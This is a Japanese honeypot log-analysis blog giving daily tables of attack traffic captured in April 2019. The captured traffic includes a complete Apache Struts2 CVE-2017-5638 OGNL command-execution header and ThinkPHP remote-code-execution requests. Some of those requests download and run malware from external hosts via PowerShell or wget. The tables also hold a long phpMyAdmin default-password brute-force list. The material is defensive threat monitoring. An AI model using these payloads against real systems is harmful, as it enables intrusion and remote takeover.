BW-Potのログ分析 (2019/04/22)
本日の総アクセス件数は205件です。送信元IP数は71IPです。
気になる通信は特にありませんでした。
| 件数 | 種別 | リクエスト |
| 67 | phpMyAdminに関する攻撃 | POST /phpmyadmin/ |
| 65 | アクセス | GET / |
| 46 | Tomcat管理ページへのブルートフォース攻撃 | GET /manager/html |
| 4 | 不正中継の調査 | GET www.baidu[.]com/ |
| 2 | phpMyAdminに関する調査 | GET /phpMyAdmin/scripts/setup.php |
| 2 | phpMyAdminに関する調査 | GET /phpmyadmin/scripts/setup.php |
| 2 | phpMyAdminに関する調査 | GET /pma/scripts/setup.php |
| 2 | phpMyAdminに関する調査 | GET /w00tw00t.at.blackhats.romanian.anti-sec:) |
| 2 | 不明 | GET /script |
| 1 | 不正中継の調査 | GET api.binance[.]com/api/v1/depth?symbol=ETHBTC |
| 1 | 不正中継の調査 | GET api.binance[.]com/api/v3/order |
| 1 | 不正中継の調査 | GET www.binance[.]com/api/v3/order |
| 1 | 不正中継の調査 | POST 188.166.41[.]194/tmUnblock.cgi |
| 1 | DFindによるスキャン | GET /w00tw00t.at.ISC.SANS.DFind:) |
| 1 | SSL証明書発行時の一時ファイルの調査 | GET /.well-known/security.txt |
| 1 | Tomato RAFに関する調査 | GET /admin-scripts.asp |
| 1 | phpMyAdminに関する調査 | GET /MyAdmin/scripts/setup.php |
| 1 | phpMyAdminに関する調査 | GET /myadmin/scripts/setup.php |
| 1 | phpMyAdminに関する調査 | GET /phpmy/scripts/setup.php |
| 1 | アクセス | GET /favicon.ico |
| 1 | クローリング | GET /robots.txt |
| 1 | サイトの構成調査 | GET /sitemap.xml |
BW-Potのログ分析 (2019/04/21)
本日の総アクセス件数は139件です。送信元IP数は56IPです。
気になる通信は特にありませんでした。
| 件数 | 種別 | リクエスト |
| 69 | phpMyAdminに関する攻撃 | POST /phpmyadmin/ |
| 55 | アクセス | GET / |
| 3 | 不正中継の調査 | GET 5.188.210[.]101/echo.php |
| 2 | FreePBXに関する調査 | GET /a2billing/admin/Public/PP_error.php?c=accessdenied |
| 2 | FreePBXに関する調査 | GET /recordings/ |
| 2 | Tomcat管理ページへのブルートフォース攻撃 | GET /manager/html |
| 1 | 不正中継の調査 | GET api.binance[.]com/api/v1/time |
| 1 | 不正中継の調査 | POST 188.166.41[.]194/tmUnblock.cgi |
| 1 | 不正中継の調査 | POST 192.168.0.[1]4/tmUnblock.cgi |
| 1 | phpMyAdminに関する調査 | GET /phpMyAdmin/scripts/setup.php |
| 1 | www.probethenet[.]com scannerによるスキャン | HEAD /redirect.php |
| 1 | クローリング | HEAD /robots.txt |
BW-Potのログ分析 (2019/04/20)
本日の総アクセス件数は289件です。送信元IP数は79IPです。
気になる通信は特にありませんでした。
| 件数 | 種別 | リクエスト |
| 72 | phpMyAdminに関する攻撃 | POST /phpmyadmin/ |
| 68 | アクセス | GET / |
| 3 | 不正中継の調査 | POST 188.166.41[.]194/tmUnblock.cgi |
| 2 | Tomcat管理ページへのブルートフォース攻撃 | GET /manager/html |
| 1 | 不正中継の調査 | HEAD 112.124.42[.]80/ |
| 1 | 不正中継の調査 | POST 5.180.40[.]102/tmUnblock.cgi |
| 1 | DFindによるスキャン | GET /w00tw00t.at.ISC.SANS.DFind:) |
| 1 | HIKVISION製の監視カメラの設定ファイルに関する調査 | GET /System/configurationFile/?auth=YWRtaW46MTEKYOBA |
| 1 | Kubernetesに関する調査 | GET /api/v1/overview/default?filterBy=&itemsPerPage=10&name=&page=1&sortBy=d,creationTimestamp |
| 1 | SSL証明書発行時の一時ファイルの調査 | GET /.well-known/security.txt |
| 1 | WordPressに関する調査 | GET /wp-login.php |
| 1 | WordPressのユーザー情報の取得 | GET ///?author=1 |
| 1 | WordPressのユーザー情報の取得 | GET ///wp-json/wp/v2/users/ |
| 1 | WordPressのユーザー情報の取得 | GET /wp-json/wp/v2/users/ |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=admin&pma_password=admin |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=admin&pma_password=pass |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=apache&pma_password=apache |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=blog&pma_password=blog |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=db&pma_password=db |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=dbs&pma_password=dbs |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=http&pma_password=http |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=nas&pma_password=nas |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=nginx&pma_password=nginx |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=popa3d&pma_password=popa3d |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=project&pma_password=project |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password= |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=1234 |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=123456 |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=1234567 |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=123456789 |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=1234567890 |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=123qwe |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=123qweasd |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=123qweasdzxc |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=2011 |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=2012 |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=2014 |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=2017 |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=2018 |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=2019 |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=2020 |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=321 |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=4321 |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=54321 |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=654321 |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=666666 |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=NAS |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=Password |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=Password1 |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=ROOT |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=aa123456 |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=abc123 |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=acces |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=acceso |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=access |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=access123 |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=admin |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=admin123 |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=administrator |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=backup |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=backupdb |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=backupdbs |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=backups |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=backupserver |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=bitcoin |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=blogs |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=charlie |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=confidential |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=database |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=db |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=dbs |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=developer |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=dollars |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=donald |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=files |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=hello |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=host |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=iloveyou |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=letmein |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=linux |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=login |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=master |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=michael |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=monkey |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=music |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=mysql |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=onetwothree |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=pass |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=pass1234 |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=pass2018 |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=passw0rd |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=password |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=password1 |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=password123 |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=passwords |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=princess |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=qazwsx |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=qnap |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=queen |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=qwerty |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=qwerty123 |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=r00t |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=rock |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=root |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=root123 |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=root1234 |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=rootadmin |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=secure |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=security |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=senha |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=server |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=shop |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=solo |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=sqlaccess |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=sunshine |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=test |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=toor |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=toor321 |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=trump |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=trustno1 |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=unix |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=usa |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=users |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=web |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=webadmin |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=webmaster |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=webs |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=welcome |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=whatever |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=wordpres |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=wordpress |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=shopdb&pma_password=shopdb |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=sql&pma_password=sql |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=ueer&pma_password=pass |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=web&pma_password=web |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=wordpress&pma_password=blog |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=wordpress&pma_password=pass |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=wordpress&pma_password=password |
| 1 | phpMyAdminに関する攻撃 | GET /phpmyadmin/index.php?lang=en&pma_username=wp&pma_password=wp |
| 1 | phpMyAdminに関する調査 | GET /index.php?lang=en |
| 1 | phpMyAdminに関する調査 | GET /mysql/admin/index.php?lang=en |
| 1 | phpMyAdminに関する調査 | GET /mysql/dbadmin/index.php?lang=en |
| 1 | phpMyAdminに関する調査 | GET /mysql/mysqlmanager/index.php?lang=en |
| 1 | phpMyAdminに関する調査 | GET /mysql/sqlmanager/index.php?lang=en |
| 1 | phpMyAdminに関する調査 | GET /phpmyadmin/index.php?lang=en |
| 1 | クローリング | GET /robots.txt |
| 1 | サイトの構成調査 | GET /sitemap.xml |
| 1 | 環境設定の調査 | GET /.env |
BW-Potのログ分析 (2019/04/19)
本日の総アクセス件数は283件です。送信元IP数は74IPです。
拡張子が以下のような通信先に対し、
Apache Struts2 の脆弱性(CVE-2017-5638)に関する通信を観測しています。
・.do
・.htm
・.html
・.jsp
・.actioon
Conternt-Type
Content-Type: %{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='nMaskCustomMuttMoloz').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
| 件数 | 種別 | リクエスト |
| 74 | phpMyAdminに関する攻撃 | POST /phpmyadmin/ |
| 62 | アクセス | GET / |
| 8 | Tomcat管理ページへのブルートフォース攻撃 | GET /manager/html/ |
| 6 | Apache Struts 2の脆弱性(CVE-2017-5638)に関する調査 | GET /login.do |
| 3 | Amazon EC2 インスタンスメタデータの調査 | GET 169.254.169[.]254/latest/meta-data |
| 3 | 不正中継の調査 | POST 188.166.41[.]194/tmUnblock.cgi |
| 3 | Apache Struts 2の脆弱性(CVE-2017-5638)に関する調査 | GET /index.action |
| 3 | Apache Struts 2の脆弱性(CVE-2017-5638)に関する調査 | GET /struts2-rest-showcase/orders.xhtml |
| 3 | Apache Struts 2の脆弱性(CVE-2017-5638)に関する調査 | GET /index.do |
| 3 | Apache Struts 2の脆弱性(CVE-2017-5638)に関する調査 | GET /home.do |
| 3 | Apache Struts 2の脆弱性(CVE-2017-5638)に関する調査 | GET /home.htm |
| 3 | Apache Struts 2の脆弱性(CVE-2017-5638)に関する調査 | GET /home.jsp |
| 3 | Apache Struts 2の脆弱性(CVE-2017-5638)に関する調査 | GET /home.xhmtl |
| 3 | Apache Struts 2の脆弱性(CVE-2017-5638)に関する調査 | GET /index.htm |
| 3 | Apache Struts 2の脆弱性(CVE-2017-5638)に関する調査 | GET /index.html |
| 3 | Apache Struts 2の脆弱性(CVE-2017-5638)に関する調査 | GET /index.jsp |
| 3 | Apache Struts 2の脆弱性(CVE-2017-5638)に関する調査 | GET /index.xhtml |
| 3 | Apache Struts 2の脆弱性(CVE-2017-5638)に関する調査 | GET /login.action |
| 3 | Apache Struts 2の脆弱性(CVE-2017-5638)に関する調査 | GET /login.htm |
| 3 | Apache Struts 2の脆弱性(CVE-2017-5638)に関する調査 | GET /login.xhtml |
| 3 | Apache Struts 2の脆弱性(CVE-2017-5638)に関する調査 | GET /main.action |
| 3 | Apache Struts 2の脆弱性(CVE-2017-5638)に関する調査 | GET /main.do |
| 3 | Apache Struts 2の脆弱性(CVE-2017-5638)に関する調査 | GET /main.htm |
| 3 | Apache Struts 2の脆弱性(CVE-2017-5638)に関する調査 | GET /main.jsp |
| 3 | Apache Struts 2の脆弱性(CVE-2017-5638)に関する調査 | GET /main.xhtml |
| 3 | Apache Struts 2の脆弱性(CVE-2017-5638)に関する調査 | GET /register.action |
| 3 | Apache Struts 2の脆弱性(CVE-2017-5638)に関する調査 | GET /register.do |
| 3 | Apache Struts 2の脆弱性(CVE-2017-5638)に関する調査 | GET /register.xhtml |
| 3 | Apache Struts 2の脆弱性(CVE-2017-5638)に関する調査 | GET /site.action |
| 3 | Apache Struts 2の脆弱性(CVE-2017-5638)に関する調査 | GET /site.do |
| 3 | Apache Struts 2の脆弱性(CVE-2017-5638)に関する調査 | GET /site.xhtml |
| 3 | 環境設定の調査 | GET /.env |
| 2 | 不正中継の調査 | GET www.msftncsi[.]com/ncsi.txt |
| 2 | D-Link デバイスに関する調査 | GET /HNAP1/ |
| 2 | SQLiteに関する調査 | GET /SQLite/main.php |
| 2 | SQLiteに関する調査 | GET /SQLiteManager-1.2.4/main.php |
| 2 | SQLiteに関する調査 | GET /SQLiteManager/main.php |
| 2 | SQLiteに関する調査 | GET /SQlite/main.php |
| 2 | SQLiteに関する調査 | GET /agSearch/SQlite/main.php |
| 2 | SQLiteに関する調査 | GET /sqlite/main.php |
| 2 | SQLiteに関する調査 | GET /sqlitemanager/main.php |
| 2 | SQLiteに関する調査 | GET /test/sqlite/SQLiteManager-1.2.0/SQLiteManager-1.2.0/main.php |
| 2 | phpMyAdminに関する調査 | GET /phpmyadmin/ |
| 2 | phpMyAdminに関する調査 | GET /phpmyadmin/scripts/setup.php |
| 2 | 不明 | GET /hudson/script |
| 2 | 不明 | GET /main.php |
| 2 | 不明 | GET /script |
| 1 | 不正中継の調査 | GET api.binance[.]com/api/v1/ticker/24hr?symbol=BTCUSDT |
| 1 | 不正中継の調査 | GET api.binance[.]com/api/v1/time |
| 1 | Apache Tomcatの脆弱性(CVE-2017-12617)に関する攻撃 | PUT /JJa06kSy21.jsp/ |
| 1 | D-Link デバイスに関する調査 | GET /HNAP1 |
| 1 | DFindによるスキャン | GET /w00tw00t.at.ISC.SANS.DFind:) |
| 1 | FreePBXに関する調査 | GET /admin//config.php |
| 1 | FreePBXに関する調査 | GET /admin/assets/js/views/login.js |
| 1 | NMAPによるスキャン | GET /Nmap/folder/check1555640709 |
| 1 | NMAPによるスキャン | GET /NmapUpperCheck1555640709 |
| 1 | NMAPによるスキャン | GET /evox/about |
| 1 | NMAPによるスキャン | GET /nmaplowercheck1555640709 |
| 1 | NMAPによるスキャン | POST /sdk |
| 1 | SSL証明書発行時の一時ファイルの調査 | GET /.well-known/security.txt |
| 1 | Tomcat管理ページへのブルートフォース攻撃 | GET /manager/html |
| 1 | Tomcat管理ページへのブルートフォース攻撃 | HEAD /manager/html |
| 1 | アクセス | GET /favicon.ico |
| 1 | アクセス | HEAD / |
| 1 | クローリング | GET /robots.txt |
| 1 | サイトの構成調査 | GET /sitemap.xml |
参考リンク
BW-Potのログ分析 (2019/04/18)
本日の総アクセス件数は166件です。送信元IP数は85IPです。
新規の通信は観測できませんでした。
| 件数 | 種別 | リクエスト |
| 72 | phpMyAdminに関する攻撃 | POST /phpmyadmin/ |
| 63 | アクセス | GET / |
| 3 | Amazon EC2 インスタンスメタデータの調査 | GET 169.254.169[.]254/latest/meta-data |
| 2 | 不正中継の調査 | GET www.msftncsi[.]com/ncsi.txt |
| 2 | 不正中継の調査 | POST 188.166.41[.]194/tmUnblock.cgi |
| 2 | 不明 | OPTIONS / |
| 1 | Cisco製ルータの脆弱性(CVE-2019-1653)に関する攻撃 | GET /cgi-bin/config.exp |
| 1 | D-Link デバイスに関する調査 | GET /HNAP1/ |
| 1 | Joomla!に関する調査 | GET /administrator/index.php |
| 1 | ThinkPHPに関する攻撃 | GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^>hydra.php |
| 1 | ThinkPHPに関する攻撃 | GET /public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('hxxp://fid.hognoob[.]se/download.exe','C:/Windows/temp/mlmlvvtftdxevaq1768.exe');start%20C:/Windows/temp/mlmlvvtftdxevaq1768.exe |
| 1 | ThinkPHPに関する攻撃 | GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('hxxp://fid.hognoob[.]se/download.exe','C:/Windows/temp/mlmlvvtftdxevaq1768.exe');start%20C:/Windows/temp/mlmlvvtftdxevaq1768.exe |
| 1 | ThinkPHPに関する調査 | GET /TP/public/index.php |
| 1 | Tomato RAFに関する調査 | GET /admin-scripts.asp |
| 1 | Tomcat管理ページへのブルートフォース攻撃 | GET /manager/html |
| 1 | WordPressに関する調査 | GET /blog/wp-login.php |
| 1 | WordPressに関する調査 | GET /cms/wp-login.php |
| 1 | WordPressに関する調査 | GET /wordpress/wp-login.php |
| 1 | WordPressに関する調査 | GET /wp/wp-login.php |
| 1 | WordPressに関する調査 | GET /wp1/wp-login.php |
| 1 | WordPressに関する調査 | GET /wp2/wp-login.php |
| 1 | WordPressに関する調査 | GET /wp3/wp-login.php |
| 1 | WordPressに関する調査 | GET /wp4/wp-login.php |
| 1 | WordPressに関する調査 | GET /wp5/wp-login.php |
| 1 | WordPressに関する調査 | GET /wp6/wp-login.php |
| 1 | WordPressに関する調査 | GET /wp7/wp-login.php |
| 1 | WordPressに関する調査 | GET /wp8/wp-login.php |
| 1 | 環境設定の調査 | GET /.env |
BW-Potのログ分析 (2019/04/17)
本日の総アクセス件数は494件です。送信元IP数は81IPです。
以下のpathに同一IPから来ていたので、すべてVOIP関連と判断しています。
- /aastra/
- /configs/
- /gs/
- /lib/
- /polycom/
- /provision/
- /provisioning/
- /spa/
- /spa2102/
- /tftp/
- /voip_provisioning/
- /xmlservices/
| 件数 | 種別 | リクエスト |
| 293 | Tomcat管理ページへのブルートフォース攻撃 | GET /manager/html |
| 73 | phpMyAdminに関する攻撃 | POST /phpmyadmin/ |
| 59 | アクセス | GET / |
| 2 | 不正中継の調査 | POST 188.166.41[.]194/tmUnblock.cgi |
| 2 | phpMyAdminに関する調査 | GET /phpMyAdmin/scripts/setup.php |
| 2 | phpMyAdminに関する調査 | GET /phpmyadmin/scripts/setup.php |
| 2 | phpMyAdminに関する調査 | GET /pma/scripts/setup.php |
| 2 | phpMyAdminに関する調査 | GET /w00tw00t.at.blackhats.romanian.anti-sec:) |
| 2 | クローリング | GET /robots.txt |
| 1 | 不正中継の調査 | GET api.binance[.]com/api/v1/time |
| 1 | 不正中継の調査 | GET api.huobi[.]pro/market/detail?symbol=ethusdt |
| 1 | 不正中継の調査 | GET www.binance[.]com/api/v1/ticker/bookTicker?symbol=ETHBTC |
| 1 | Apache Struts 2に関する調査 | GET /index.action |
| 1 | Apache Struts 2に関する調査 | GET /struts2-rest-showcase/orders.xhtml |
| 1 | Apache Strutsに関する調査 | GET /index.do |
| 1 | DFindによるスキャン | GET /w00tw00t.at.ISC.SANS.DFind:) |
| 1 | Kubernetesに関する調査 | GET /api/v1/overview/default?filterBy=&itemsPerPage=10&name=&page=1&sortBy=d,creationTimestamp |
| 1 | ThinkPHPに関する攻撃 | GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=wget%20hxxp://81.6.42[.]123/a_thk.sh%20-O%20/tmp/a;%20chmod%200777%20/tmp/a;%20/tmp/a; |
